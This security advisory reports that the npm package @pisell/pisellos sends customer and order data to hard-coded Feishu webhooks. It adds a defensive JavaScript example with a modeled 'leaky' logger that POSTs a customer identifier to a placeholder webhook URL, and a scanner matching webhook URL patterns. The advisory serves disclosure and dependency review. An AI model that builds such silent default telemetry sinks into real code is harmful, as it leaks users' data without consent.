
MAL-2026-4417

Malicious code in @pisell/pisellos (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (92e6d35e4cff1457b43bc8b864e196a659fe12cf9028311e27bf2ceb9fcefe2f)

The ScanOrder and VenueBooking solution modules (dist/solution/ScanOrder/index.js:545-546 and lib/solution/VenueBooking/index.js:381-382) hard-code default logger configurations pointing at four author-controlled Feishu bot webhooks under open.feishu.cn/open-apis/bot/v2/hook/. When a consuming application instantiates ScanOrderImpl or VenueBookingImpl without supplying an explicit scanOrderLoggerConfig/loggerConfig, every method-call payload, including cacheId, customer identifiers resolved from login payloads, order/product details, scan codes, and error objects with stack traces, is POSTed via fetch() to those Feishu endpoints. The README advertises a generic modular SDK and does not disclose this outbound telemetry; the destination is not configurable through normal use because the defaults are baked into the module.

The presence of a 'REPLACE_ME' placeholder elsewhere in the same logger code suggests these defaults were left in unintentionally, but the effect on consumers is the same: any host app integrating these solutions silently leaks order-flow and customer data to the package author. The relay fires when the solution module is instantiated by a host application (not at import or install time), so the data flow occurs in production usage rather than at developer install.
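The following JavaScript is an added example and is not code from @pisell/pisellos or from the amazon-inspector report. It models the class of defect the report describes (an SDK whose logger falls back to baked-in remote webhooks when the integrator supplies no config) next to a hardened factory that defaults to no remote sink and rejects destinations outside an explicit allowlist, and it includes a small source scanner a reviewer can run over a package's dist files to surface hard-coded webhook URLs before adopting a dependency. The function names, the PLACEHOLDER hook id, the sample event and the sample source text are all constructed for illustration; fetch() is injected as a recording stub so the example runs offline.

```javascript
// Added example: models the "leaky default logger" pattern and its fix.
// Nothing here is the package's own code; the hook id below is a placeholder.
const LEAKY_DEFAULT_CONFIG = {
  webhooks: ['https://open.feishu.cn/open-apis/bot/v2/hook/PLACEHOLDER_HOOK_ID'],
};

// Unsafe pattern: a missing config silently falls back to the baked-in sinks,
// so every logged event leaves the host application.
function createLeakyLogger(loggerConfig, fetchImpl) {
  const cfg = loggerConfig || LEAKY_DEFAULT_CONFIG;
  return {
    log(event) {
      for (const url of cfg.webhooks) {
        fetchImpl(url, { method: 'POST', body: JSON.stringify(event) });
      }
    },
  };
}

// Hardened pattern: no config means no remote sink at all, and every configured
// destination must be on the integrator's explicit host allowlist, checked at
// construction time so a bad default fails loudly rather than leaking quietly.
function createSafeLogger(loggerConfig, allowedHosts, fetchImpl) {
  const sinks = (loggerConfig && loggerConfig.webhooks) || [];
  for (const url of sinks) {
    const host = new URL(url).hostname;
    if (!allowedHosts.includes(host)) {
      throw new Error(`logger destination ${host} is not on the telemetry allowlist`);
    }
  }
  return {
    log(event) {
      for (const url of sinks) {
        fetchImpl(url, { method: 'POST', body: JSON.stringify(event) });
      }
    },
  };
}

// Offline stand-in for fetch() that records what would have been sent.
function recordingFetch() {
  const calls = [];
  const fn = (url, init) => {
    calls.push({ url, body: init.body });
    return Promise.resolve({ ok: true });
  };
  fn.calls = calls;
  return fn;
}

// Simulates a host app that instantiates the SDK without a logger config and
// makes one method call; returns the outbound requests each pattern produces.
function demo() {
  const event = { method: 'scanOrder', cacheId: 'c-123', customerId: 'cust-42' }; // constructed
  const leaky = recordingFetch();
  createLeakyLogger(undefined, leaky).log(event);
  const safe = recordingFetch();
  createSafeLogger(undefined, ['logs.example.internal'], safe).log(event);
  return { leakyCalls: leaky.calls, safeCalls: safe.calls };
}

// Dependency-review helper: report URL literals that look like chat-bot
// webhooks. Path markers cover the Feishu bot hook path named in the advisory
// plus two other common incoming-webhook shapes.
const WEBHOOK_MARKERS = ['/open-apis/bot/v2/hook/', 'hooks.slack.com/services/', '/api/webhooks/'];
const URL_RE = /https?:\/\/[^\s'"`<>)]+/g;

function scanForWebhooks(sourceText) {
  const hits = [];
  sourceText.split('\n').forEach((line, i) => {
    for (const url of line.match(URL_RE) || []) {
      if (WEBHOOK_MARKERS.some((m) => url.includes(m))) hits.push({ line: i + 1, url });
    }
  });
  return hits;
}

// Constructed sample of what a bundled dist file with such defaults might look like.
const SAMPLE_SOURCE = [
  'const DEFAULT_LOGGER = {',
  "  webhooks: ['https://open.feishu.cn/open-apis/bot/v2/hook/aaaa-placeholder'],",
  "  docs: 'https://example.com/docs',",
  '};',
  "const SLACK = 'https://hooks.slack.com/services/T000/B000/placeholder';",
].join('\n');

// Usage: node this-file.js
console.log(demo());
console.log(scanForWebhooks(SAMPLE_SOURCE));
```

Running demo() shows the difference directly: the leaky logger emits one POST to the placeholder Feishu URL carrying the customer identifier, while the hardened logger emits nothing because no destination was configured. Pointing scanForWebhooks at the real dist files of a candidate dependency (for example by reading them with fs before install-time approval) flags string literals such as the ones the advisory cites so they can be reviewed against the README's stated behaviour.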

Affected packages

npm / @pisell/pisellos

No fixed version published yet for @pisell/pisellos (npm). Pin to a known-safe version or switch to an alternative.

References